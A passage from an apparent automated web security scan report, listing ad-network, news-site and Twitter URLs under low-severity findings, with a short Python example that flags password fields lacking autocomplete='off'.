11.453. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1068587247@Top1

11.454. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1089179764@Top1

11.455. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1104028281@Top1

11.456. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1105447520@Top1

11.457. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1210886297@Top1

11.458. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1452948432@Top1

11.459. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1486965027@Top1

11.460. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1498309992@Top1

11.461. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1718093063@Top1

11.462. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1728982362@Top1

11.463. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1847523344@Top1

11.464. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1932249236@Top1

11.465. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1964557901@Top1

11.466. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1969188118@Top1

11.467. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/122237937@Bottom3

11.468. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/243052316@Bottom3

11.469. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/311285161@Bottom3

11.470. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/438702563@Bottom3

11.471. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/509694158@Bottom3

11.472. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/536763197@Bottom3

11.473. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/567583486@Bottom3

11.474. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/569818986@Bottom3

11.475. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/598415254@Bottom3

11.476. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/709688261@Bottom3

11.477. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/781946036@Bottom3

11.478. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/816963349@Bottom3

11.479. http://network.realmedia.com/RealMedia/ads/click_lx.ads/bostonherald/ros/728x90/jx/ss/a/L31/1020254070/Top1/USNetwork/BCN2010090393_015a_HRBlock/hrblock_cc_728.html/726348573830307044726341416f7670

11.480. http://network.realmedia.com/RealMedia/ads/click_lx.ads/bostonherald/ros/728x90/jx/ss/a/L31/1141449012/Top1/USNetwork/BCN2010090393_015a_HRBlock/hrblock_cc_728.html/726348573830307044726341416f7670

11.481. http://network.realmedia.com/RealMedia/ads/click_lx.ads/bostonherald/ros/728x90/jx/ss/a/L31/1183243859/Top1/USNetwork/BCN2010090393_015a_HRBlock/hrblock_cc_728.html/726348573830307044726341416f7670

11.482. http://network.realmedia.com/RealMedia/ads/click_lx.ads/bostonherald/ros/728x90/jx/ss/a/L31/1310742069/Top1/USNetwork/BCN2010090393_015a_HRBlock/hrblock_cc_728.html/726348573830307044726341416f7670

11.483. http://network.realmedia.com/RealMedia/ads/click_lx.ads/bostonherald/ros/728x90/jx/ss/a/L31/141555552/Top1/USNetwork/BCN2010090393_015a_HRBlock/hrblock_cc_728.html/726348573830307044726341416f7670

11.484. http://network.realmedia.com/RealMedia/ads/click_lx.ads/bostonherald/ros/728x90/jx/ss/a/L31/1616156922/Top1/USNetwork/BCN2010090393_015a_HRBlock/hrblock_cc_728.html/726348573830307044726341416f7670

11.485. http://network.realmedia.com/RealMedia/ads/click_lx.ads/bostonherald/ros/728x90/jx/ss/a/L31/1911154246/Top1/USNetwork/BCN2010090393_015a_HRBlock/hrblock_cc_728.html/726348573830307044726341416f7670

11.486. http://network.realmedia.com/RealMedia/ads/click_lx.ads/bostonherald/ros/728x90/jx/ss/a/L31/2083207614/Top1/USNetwork/BCN2010090393_015a_HRBlock/hrblock_cc_728.html/726348573830307044726341416f7670

11.487. http://network.realmedia.com/RealMedia/ads/click_lx.ads/bostonherald/ros/728x90/jx/ss/a/L31/219928446/Top1/USNetwork/BCN2010110890_003_CMT/CMT_NETBLOCK_728.html/726348573830307044726341416f7670

11.488. http://network.realmedia.com/RealMedia/ads/click_lx.ads/bostonherald/ros/728x90/jx/ss/a/L31/53616777/Top1/USNetwork/BCN2010090393_015a_HRBlock/hrblock_cc_728.html/726348573830307044726341416f7670

11.489. http://network.realmedia.com/RealMedia/ads/click_lx.ads/bostonherald/ros/728x90/jx/ss/a/L31/537212856/Top1/USNetwork/BCN2010090393_015a_HRBlock/hrblock_cc_728.html/726348573830307044726341416f7670

11.490. http://network.realmedia.com/RealMedia/ads/click_lx.ads/bostonherald/ros/728x90/jx/ss/a/L31/702021509/Top1/USNetwork/BCN2010090393_015a_HRBlock/hrblock_cc_728.html/726348573830307044726341416f7670

11.491. http://network.realmedia.com/RealMedia/ads/click_lx.ads/bostonherald/ros/728x90/jx/ss/a/L31/857611358/Top1/USNetwork/BCN2010110890_003_CMT/CMT_NETBLOCK_728.html/726348573830307044726341416f7670

11.492. http://nl.imlive.com/

11.493. http://nl.imlive.com/waccess/

11.494. http://no.imlive.com/

11.495. http://no.imlive.com/waccess/

11.496. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1204429614@Top,Middle,Right,Right1,x01,x02,x03,x04

11.497. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1244397821@Top,Middle,Right,Right1,x01,x02,x03,x04

11.498. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1494452952@Top,Middle,Right,Right1,x01,x02,x03,x04

11.499. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1202419556/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/7263485738303033424c73414270536c

11.500. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1247919265/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/7263485738303033424c73414270536c

11.501. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1258292573/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/7263485738303033424c73414270536c

11.502. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/126580716/Right/Dom_Ent/House-Sound-Rect-300x250/Soundings_subscribead_300x250.jpg/7263485738303033424c73414270536c

11.503. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/133886311/x04/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/7263485738303033424c73414270536c

11.504. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1410609386/x04/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/7263485738303033424c73414270536c

11.505. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1462172569/Right1/Dom_Ent/House-Sound-Btn/bs_de_ad_300x100.jpg/7263485738303033424c73414270536c

11.506. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/167914676/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/7263485738303033424c73414270536c

11.507. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1790696998/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/7263485738303033424c73414270536c

11.508. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1813901630/x02/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/7263485738303033424c73414270536c

11.509. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2021312465/x01/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/7263485738303033424c73414270536c

11.510. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2141444174/x03/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/7263485738303033424c73414270536c

11.511. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/589036194/x03/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/7263485738303033424c73414270536c

11.512. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/672313137/x01/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/7263485738303033424c73414270536c

11.513. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/677208420/x02/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/7263485738303033424c73414270536c

11.514. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/blogs/news/lone_republican@Top,Right,Middle!Middle

11.515. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/blogs/news/lone_republican@Top,Right,Middle!Right

11.516. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/blogs/news/lone_republican@Top,Right,Middle!Top

11.517. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/home@Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom!Bottom

11.518. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/home@Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom!Middle

11.519. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/home@Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom!Middle1

11.520. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/home@Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom!Middle2

11.521. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/home@Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom!Top

11.522. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/home@Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom!x14

11.523. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/home@Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom!x15

11.524. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/home@Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom!x16

11.525. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/home@x01!x01

11.526. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/mediacenter@Top,Right,Middle,Bottom!Middle

11.527. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/politics/article@Top,Right,Middle,Bottom!Bottom

11.528. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/politics/article@Top,Right,Middle,Bottom!Middle

11.529. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/politics/article@Top,Right,Middle,Bottom!Right

11.530. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/politics/article@Top,Right,Middle,Bottom!Top

11.531. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/regional/article@Top,Right,Middle,Middle1,Bottom!Bottom

11.532. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/regional/article@Top,Right,Middle,Middle1,Bottom!Middle

11.533. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/regional/article@Top,Right,Middle,Middle1,Bottom!Middle1

11.534. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/regional/article@Top,Right,Middle,Middle1,Bottom!Right

11.535. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/regional/article@Top,Right,Middle,Middle1,Bottom!Top

11.536. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/home@Top,Middle,Middle1,Bottom!Bottom

11.537. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/home@Top,Middle,Middle1,Bottom!Middle

11.538. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/home@Top,Middle,Middle1,Bottom!Middle

11.539. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/home@Top,Middle,Middle1,Bottom!Middle1

11.540. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/home@Top,Middle,Middle1,Bottom!Middle1

11.541. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/home@Top,Middle,Middle1,Bottom!Top

11.542. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/home@x05!x05

11.543. http://oascentral.bostonherald.com/RealMedia/ads/adstream_mjx.ads/bh.heraldinteractive.com/home/1392253820@Position1,Position2

11.544. http://pu.imlive.com/

11.545. http://pu.imlive.com/waccess/

11.546. http://ru.imlive.com/

11.547. http://ru.imlive.com/waccess/

11.548. http://se.imlive.com/

11.549. http://se.imlive.com/waccess/

11.550. http://smm.sitescout.com/click

11.551. http://syndication.mmismm.com/mmtnt.php

11.552. http://tag.contextweb.com/TAGPUBLISH/getad.aspx

11.553. http://tap.rubiconproject.com/oz/feeds/invite-media-rtb/tokens/

11.554. http://tap.rubiconproject.com/oz/sensor

11.555. http://tap.rubiconproject.com/partner/agent/rubicon/channels.js

11.556. http://this.content.served.by.adshuffle.com/p/kl/46/799/r/12/4/8/ast0k3n/VESIfHDf6VyGxLxswN5oXZuDY9-JNctdeWwI0QV6uhKZSsWwFXkKSQ==/click.txt

11.557. http://this.content.served.by.adshuffle.com/p/kl/46/799/r/12/4/8/ast0k3n/VESIfHDf6VyGxLxswN5oXZuDY9-JNctdeWwI0QV6uhKZSsWwFXkKSQ==/view.pxl

11.558. http://this.content.served.by.adshuffle.com/p/kl/46/799/r/12/4/8/ast0k3n/VESIfHDf6VyGxLxswN5oXZuDY9-JNctdlx3I0VSaliO7Vdbu-ffjKQ==/click.txt

11.559. http://this.content.served.by.adshuffle.com/p/kl/46/799/r/12/4/8/ast0k3n/VESIfHDf6VyGxLxswN5oXZuDY9-JNctdlx3I0VSaliO7Vdbu-ffjKQ==/click.txt&clickTag2=http:/r1-ads.ace.advertising.com/click/site=0000766161/mnum=0000935955/cstr=44199605=_4d436292,1445734807,766161^935955^1183^0,1_/xsxdata=$xsxdata/bnum=44199605/optn=64

11.560. http://this.content.served.by.adshuffle.com/p/kl/46/799/r/12/4/8/ast0k3n/VESIfHDf6VyGxLxswN5oXZuDY9-JNctdlx3I0VSaliO7Vdbu-ffjKQ==/view.pxl

11.561. http://tr.imlive.com/

11.562. http://tr.imlive.com/waccess/

11.563. http://voken.eyereturn.com/

11.564. http://voken.eyereturn.com/

11.565. http://voken.eyereturn.com/pb/get

11.566. http://voken.eyereturn.com/pix

11.567. http://www.addthis.com/bookmark.php

11.568. http://www.blackvoices.com/$|http:/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video

11.569. http://www.moxiesoft.com/tal_products/chat.aspx

11.570. http://www.nydailynews.com/blogs/jets/2011/01/live-chat-friday-noon-1

11.571. http://www.nydailynews.com/blogs/rangers/2011/01/live-chat-wednesday-at-2-pm

11.572. http://www.parkersoft.co.uk/client.aspx

11.573. http://www.parkersoft.co.uk/supnotes.aspx

11.574. http://www.soundingsonline.com/news/mishaps-a-rescues/272642-mishaps-a-rescues-connecticut-and-new-york-jan

11.575. http://www.stylemepretty.com/|http:/stylehive.com|http:/stylelist.com|http:/www.outblush.com/|http:/www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.msn.com|msn.com/wonderwall|v14.msn.com/|preview.msn.com/|www.msn.com/preview.aspx|mtv.com/videos/|mtv.com/

11.576. http://www.zvents.com/zat

11.577. http://xads.zedo.com/ads2/c

12. Password field with autocomplete enabled
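
Finding class 12 is raised for every `<input type="password">` that does not disable browser autofill through `autocomplete="off"` on the field or on its enclosing `<form>`. The Python below is an added example of that check, not the CloudScan crawler's own code; the HTML snippets it scans are constructed for the example, and the form actions in them (`/users/login`, `/a`, `/b`) are placeholders rather than anything observed on the listed hosts. One caveat before triaging these entries: mainstream browsers have ignored `autocomplete="off"` on password fields since around 2014 and offer to save the credential anyway, so the finding is informational and the real control is not storing the password in a shared-browser profile in the first place.

```python
"""Flag password inputs that do not disable browser autocomplete.

Added example: a minimal static check of the kind behind the
"Password field with autocomplete enabled" finding. Not the crawler's
own implementation. A password input is reported unless it, or the
<form> that contains it, carries autocomplete="off".
"""
from html.parser import HTMLParser


class PasswordAutocompleteScanner(HTMLParser):
    """Collect (form_action, field_name) for every unprotected password input."""

    def __init__(self):
        super().__init__()
        self.form_stack = []   # (action, autocomplete) for each open <form>
        self.findings = []     # (form_action, input_name) tuples

    def handle_starttag(self, tag, attrs):
        # HTMLParser lowercases attribute names; values may be None.
        a = {k: (v or "") for k, v in attrs}
        if tag == "form":
            self.form_stack.append((a.get("action", ""),
                                    a.get("autocomplete", "").lower()))
        elif tag == "input" and a.get("type", "text").lower() == "password":
            if self.form_stack:
                form_action, form_auto = self.form_stack[-1]
            else:
                form_action, form_auto = "(no form)", ""
            field_auto = a.get("autocomplete", "").lower()
            # Report unless either the field or its form opts out.
            if field_auto != "off" and form_auto != "off":
                self.findings.append((form_action, a.get("name", "(unnamed)")))

    def handle_endtag(self, tag):
        if tag == "form" and self.form_stack:
            self.form_stack.pop()


def scan_password_autocomplete(html: str):
    """Return the list of unprotected password fields found in `html`."""
    scanner = PasswordAutocompleteScanner()
    scanner.feed(html)
    scanner.close()
    return scanner.findings


# Constructed sample documents (not captured from the hosts in this report).
SAMPLE_PAGES = {
    "login-unsafe":
        '<form action="/users/login"><input name="user">'
        '<input type="password" name="pass"></form>',
    "login-form-off":
        '<form action="/login" autocomplete="off">'
        '<input type="password" name="pw"></form>',
    "login-field-off":
        '<form action="/login">'
        '<input type="password" name="pw" autocomplete="off"/></form>',
    "mixed":
        '<form action="/a"><input type="PASSWORD" name="p1"></form>'
        '<form action="/b" autocomplete="off">'
        '<input type="password" name="p2"></form>',
}


if __name__ == "__main__":
    for label, page in SAMPLE_PAGES.items():
        for action, field in scan_password_autocomplete(page):
            print(f"{label}: password field '{field}' in form '{action}' "
                  f"has autocomplete enabled")
```

The check deliberately treats an input outside any form as unprotected, since no form-level `autocomplete="off"` can apply to it; that matches how the scanner reports bare login widgets embedded in a page.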

12.1. http://ar.imlive.com/

12.2. http://bostonherald.com/track/inside_track/view.bg

12.3. http://bostonherald.com/track/star_tracks/view.bg

12.4. http://bostonherald.com/users/login

12.5. http://bostonherald.com/users/register/

12.6. http://br.imlive.com/

12.7. http://cafr.imlive.com/

12.8. http://de.imlive.com/

12.9. http://digg.com/submit

12.10. http://digg.com/submit

12.11. http://dk.imlive.com/

12.12. http://es.imlive.com/

12.13. http://fr.imlive.com/

12.14. http://gr.imlive.com/

12.15. http://imlive.com/

12.16. http://imlive.com/homepagems3.asp

12.17. http://imlive.com/webcam-login/

12.18. http://in.imlive.com/

12.19. http://it.imlive.com/

12.20. http://jp.imlive.com/

12.21. http://mx.imlive.com/

12.22. http://nl.imlive.com/

12.23. http://no.imlive.com/

12.24. http://pu.imlive.com/

12.25. http://ru.imlive.com/

12.26. http://se.imlive.com/

12.27. http://support.moxiesoft.com/

12.28. http://tr.imlive.com/

12.29. http://twitter.com/

12.30. http://twitter.com/247realmedia

12.31. http://twitter.com/AddThis

12.32. http://twitter.com/Applebees

12.33. http://twitter.com/AshieApple

12.34. http://twitter.com/Beckett_News

12.35. http://twitter.com/BosHerald_Edge/

12.36. http://twitter.com/ChrisLambton13

12.37. http://twitter.com/ConanOBrien

12.38. http://twitter.com/DustinPedroia15

12.39. http://twitter.com/ExpertDan

12.40. http://twitter.com/GQMagazine

12.41. http://twitter.com/Gr8BosFoodBank

12.42. http://twitter.com/Harvard

12.43. http://twitter.com/Jarvis_Green

12.44. http://twitter.com/JennyMcCarthy

12.45. http://twitter.com/John_W_Henry

12.46. http://twitter.com/KaseyRKahl

12.47. http://twitter.com/KhloeKardashian

12.48. http://twitter.com/KimKardashian

12.49. http://twitter.com/Late_Show

12.50. http://twitter.com/LibertyHotel

12.51. http://twitter.com/Michael_Joseph

12.52. http://twitter.com/MittRomney

12.53. http://twitter.com/NewYorkPost

12.54. http://twitter.com/Nicole_114

12.55. http://twitter.com/Oprah

12.56. http://twitter.com/PageLines

12.57. http://twitter.com/PhantomGourmet

12.58. http://twitter.com/Prucenter

12.59. http://twitter.com/PureADK

12.60. http://twitter.com/ROBERTPLANT

12.61. http://twitter.com/RealLamarOdom

12.62. http://twitter.com/RobertDuffy

12.63. http://twitter.com/ScampoLiberty

12.64. http://twitter.com/Script_Junkie

12.65. http://twitter.com/Sean_P_Doyle

12.66. http://twitter.com/Servigistics

12.67. http://twitter.com/ShaunieONeal

12.68. http://twitter.com/Simply_b06

12.69. http://twitter.com/Siobhan_Magnus

12.70. http://twitter.com/SlexAxton

12.71. http://twitter.com/StarWrit

12.72. http://twitter.com/Support

12.73. http://twitter.com/Svantasukhai

12.74. http://twitter.com/THE_REAL_SHAQ

12.75. http://twitter.com/TV38Boston

12.76. http://twitter.com/TechCrunch

12.77. http://twitter.com/TheKateBosworth

12.78. http://twitter.com/Trackgals

12.79. http://twitter.com/Trackgals/

12.80. http://twitter.com/_juliannemoore

12.81. http://twitter.com/ajpiano

12.82. http://twitter.com/androidnewsblog

12.83. http://twitter.com/backstreetboys

12.84. http://twitter.com/benmezrich

12.85. http://twitter.com/bennadel

12.86. http://twitter.com/bostonherald

12.87. http://twitter.com/cjronson

12.88. http://twitter.com/cowboy

12.89. http://twitter.com/creationix

12.90. http://twitter.com/dandenney

12.91. http://twitter.com/danwrong

12.92. http://twitter.com/davevogler

12.93. http://twitter.com/deionbranch84

12.94. http://twitter.com/dougneiner

12.95. http://twitter.com/ebello

12.96. http://twitter.com/ericmmartin

12.97. http://twitter.com/gercheq

12.98. http://twitter.com/harvardlampoon

12.99. http://twitter.com/j_hollender

12.100. http://twitter.com/jayleno

12.101. http://twitter.com/jbchang

12.102. http://twitter.com/joedwinell/

12.103. http://twitter.com/joemccann

12.104. http://twitter.com/jordanknight

12.105. http://twitter.com/kennychesney

12.106. http://twitter.com/kfaulk33

12.107. http://twitter.com/lapubell

12.108. http://twitter.com/login

12.109. http://twitter.com/malsup

12.110. http://twitter.com/malsup/favorites

12.111. http://twitter.com/malsup/lists/memberships

12.112. http://twitter.com/mariamenounos

12.113. http://twitter.com/mattbanks

12.114. http://twitter.com/mennovanslooten

12.115. http://twitter.com/messengerpost

12.116. http://twitter.com/miketaylr

12.117. http://twitter.com/moxiesoft

12.118. http://twitter.com/onlyjazz

12.119. http://twitter.com/oschina

12.120. http://twitter.com/rachbarnhart

12.121. http://twitter.com/rem

12.122. http://twitter.com/rickrussie

12.123. http://twitter.com/roctimo

12.124. http://twitter.com/rwaldron

12.125. http://twitter.com/ryanolson

12.126. http://twitter.com/scott_gonzalez

12.127. http://twitter.com/search

12.128. http://twitter.com/sentience

12.129. http://twitter.com/simplemodal

12.130. http://twitter.com/sitepointdotcom

12.131. http://twitter.com/slaterusa

12.132. http://twitter.com/stubbornella

12.133. http://twitter.com/thehomeorg

12.134. http://twitter.com/townsandtrails

12.135. http://twitter.com/travis

12.136. http://twitter.com/tylerseguin92

12.137. http://twitter.com/waynecountylife

12.138. http://twitter.com/webandy

12.139. http://twitter.com/zonajones

12.140. http://www.bostonherald.com/business/automotive/view/20110128ford_2010_profit_highest_in_a_decade_as_sales_rise/format=comments&srvc=home&position=also

12.141. http://www.bostonherald.com/business/general/view/20110128economist_warns_on_us_budget_ex-obama_adviser_spending_cuts_endanger_recovery/format=comments&srvc=home&position=also

12.142. http://www.bostonherald.com/business/general/view/20110128wal-mart_seeks_opening_chains_moves_toward_hub_draw_ire_from_jobs_group/format=comments&srvc=home&position=6

12.143. http://www.bostonherald.com/entertainment/lifestyle/view/20110128get_hot_ways_to_take_the_chill_out_of_winter/format=comments&srvc=home&position=also

12.144. http://www.bostonherald.com/entertainment/movies/reviews/view/20110128another_exorcist_remake_yeah_rite/format=comments&srvc=home&position=2

12.145. http://www.bostonherald.com/jobfind/news/technology/view/20110128study_morecos_usingfacebooktwitter_formarketing/format=comments&srvc=home&position=also

12.146. http://www.bostonherald.com/news/national/general/view/20110128remembering_the_challengers_haunting_explosion/format=comments&srvc=home&position=5

12.147. http://www.bostonherald.com/news/politics/view/20110128mitt_romney_catches_up_with_boston_gop_pols/format=comments&srvc=home&position=1

12.148. http://www.bostonherald.com/news/politics/view/20110128speaker_deleo_shakes_up_house/format=comments&srvc=home&position=0

12.149. http://www.bostonherald.com/news/regional/view.bg

12.150. http://www.bostonherald.com/news/regional/view/20110128another_winter_wallop_batters_boston/format=comments&srvc=home&position=also

12.151. http://www.bostonherald.com/news/regional/view/20110128feds_fake_cop_cammed_dates_alleged_thief_scored_women_as_us_marshal_on_craigslist/format=comments&srvc=home&position=4

12.152. http://www.bostonherald.com/sports/basketball/celtics/view/20110128shaq_feels_needle_again_shot-up_center_plans_to_play_tonight/format=comments&srvc=home&position=also

12.153. http://www.bostonherald.com/sports/football/patriots/view/20110128confidence_on_rebound_meriweather_wont_be_bothered_by_naysayers/format=comments&srvc=home&position=7

12.154. http://www.bostonherald.com/track/celebrity/view/20110127actor_charlie_sheen_hospitalized_publicist_says/format=comments&srvc=track&position=also

12.155. http://www.bostonherald.com/track/inside_track/view/20110127boy_banders_faithful_to_fenway/format=comments&srvc=track&position=also

12.156. http://www.bostonherald.com/track/inside_track/view/20110128hernia_sends_hearty_partier_sheen_to_the_hospital/format=comments&srvc=home&position=also

12.157. http://www.bostonherald.com/track/inside_track/view/20110128hernia_sends_hearty_partier_sheen_to_the_hospital/format=comments&srvc=track&position=also

12.158. http://www.bostonherald.com/track/inside_track/view/20110128moores_the_merrier_at_hasty_festivities/format=comments&srvc=home&position=3

12.159. http://www.bostonherald.com/users/register

12.160. http://www.bostonherald.com/users/register/

12.161. http://www.paperg.com/

12.162. https://www.paperg.com/post.php

12.163. https://www.paperg.com/post.php

12.164. http://www.parker-software.com/forum/

12.165. http://www.parkersoft.co.uk/client.aspx

12.166. http://www.screenthumbs.com/

12.167. http://www.screenthumbs.com/about

12.168. http://www.screenthumbs.com/contact

12.169. http://www.screenthumbs.com/forgot

12.170. http://www.screenthumbs.com/linkthumbs

12.171. http://www.screenthumbs.com/plugins

12.172. http://www.screenthumbs.com/service

12.173. http://www.screenthumbs.com/signup

12.174. http://www.screenthumbs.com/signup.php

12.175. http://www.stylemepretty.com/|http:/stylehive.com|http:/stylelist.com|http:/www.outblush.com/|http:/www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.msn.com|msn.com/wonderwall|v14.msn.com/|preview.msn.com/|www.msn.com/preview.aspx|mtv.com/videos/|mtv.com/

13. Source code disclosure

14. Referer-dependent response

14.1. http://ad.doubleclick.net.57389.9231.302br.net/jsi/adi/N4682.132309.BURSTMEDIA/B4421704.7

